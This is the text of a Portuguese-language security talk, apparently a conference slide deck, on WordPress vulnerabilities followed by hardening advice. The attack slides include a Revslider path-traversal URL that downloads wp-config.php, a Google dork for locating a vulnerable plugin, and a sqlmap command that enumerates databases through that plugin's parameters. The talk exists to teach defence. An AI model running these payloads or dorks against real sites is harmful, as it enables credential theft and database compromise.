WordPress Vs HackersA Rebelião das Máquinas

Quem somos

Thiago Lenon

O “Canive Suiço”

=

Diversas facetas

Hackers vs WordPress

Momento “Reflexão”

“O problema com os programadores é que você nunca consegue saber o que eles estão fazendo antes de ser tarde demais.”Seymour Cray

“Quanto maior facilidade, maior a probabilidade para o desenvolvedor fazer cagada.”Pensador desconhecido

Cruel realidade

Fonte https://wappalyzer.com/categories/cms (01/06/2015)

CMS mais utilizados

Cruel realidadeVulnerabilidades por Ano

Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)

Cruel realidade

Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)

Tipos de Vulnerabilidades

Em qualquer lugar a qualquer hora

http://www.aszone.com.br/2015/06/list-of-potentially-affected-themes-wordpress/

Hackers vs WordPress

Local File Download

Exploit Revslider em ação.LFD = Local File Download, explicar o que é, o que acontece no código.● http://wordpress.local/wp-admin/admin-ajax.php?

action=revslider_show_image&img=/uploads/2015/06/wordpress-camp.jpg

● http://wordpress.local/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Local File Download

Onde está o PROBLEMA ?

Local File Download

Local File Download

Sql Injection

Sql Injection

!passo

Dork: inurl:season=*league_id=*matchday

https://google.com/search?q=inurl%3Aseason%3D*league_id%3D*match_day

Sql Injection

python sqlmap.py -u "http://localhost/wordpress/?season=1&league_id=1&match_day=1&team_id=1" --dbs

Sql Injection

Sql InjectionOnde está o PROBLEMA ?

Sql Injection

Hackers vs WordPress

Dicas para sobrevivênciaDurante desenvolvimento● Siga os padrões de criação de temas e plugins do WordPress;● Implemente testes unitários;● Pratique "Par Programming";● Pratique "Code Review";● Pentest em ciclos evolutivos;● Metodologia de desenvolvimento seguro;

Dicas para sobrevivênciaWordPress● Alteração do nome do usuário “admin” e senhas HARDCORE;● Não instalar vários plugins de segurança;● Antes de instalar pesquise sobre os plugins e temas;● Modo Debug false; ● Manter o core, temas e plugins atualizados;● Desabilitar a função de edição dos temas e plugins;● Bloquear Brute force e visualização de pastas;● Utilizar robots.txt ;● Usar as constantes no wp-config:

WP_CONTENT_DIR, WP_PLUGIN_DIR, UPLOADS, WP_AUTO_UPDATE_CORE, WP_HTTP_BLOCK_EXTERNAL

●

Dicas para sobrevivênciaInfraestrutura e Segurança● Prepração de infra;● Uso de ferramentas de vulnerabilidades;

○ Use WpScan;○ Use Accunetix;○ Use Metaexploit;

● Alterar e bloquear o wp-admin/;● Criar subdomínio para ambiente administrativo;

Obrigado !!!

@thiagodieb

@lenonleite

http://www.aszone.com.br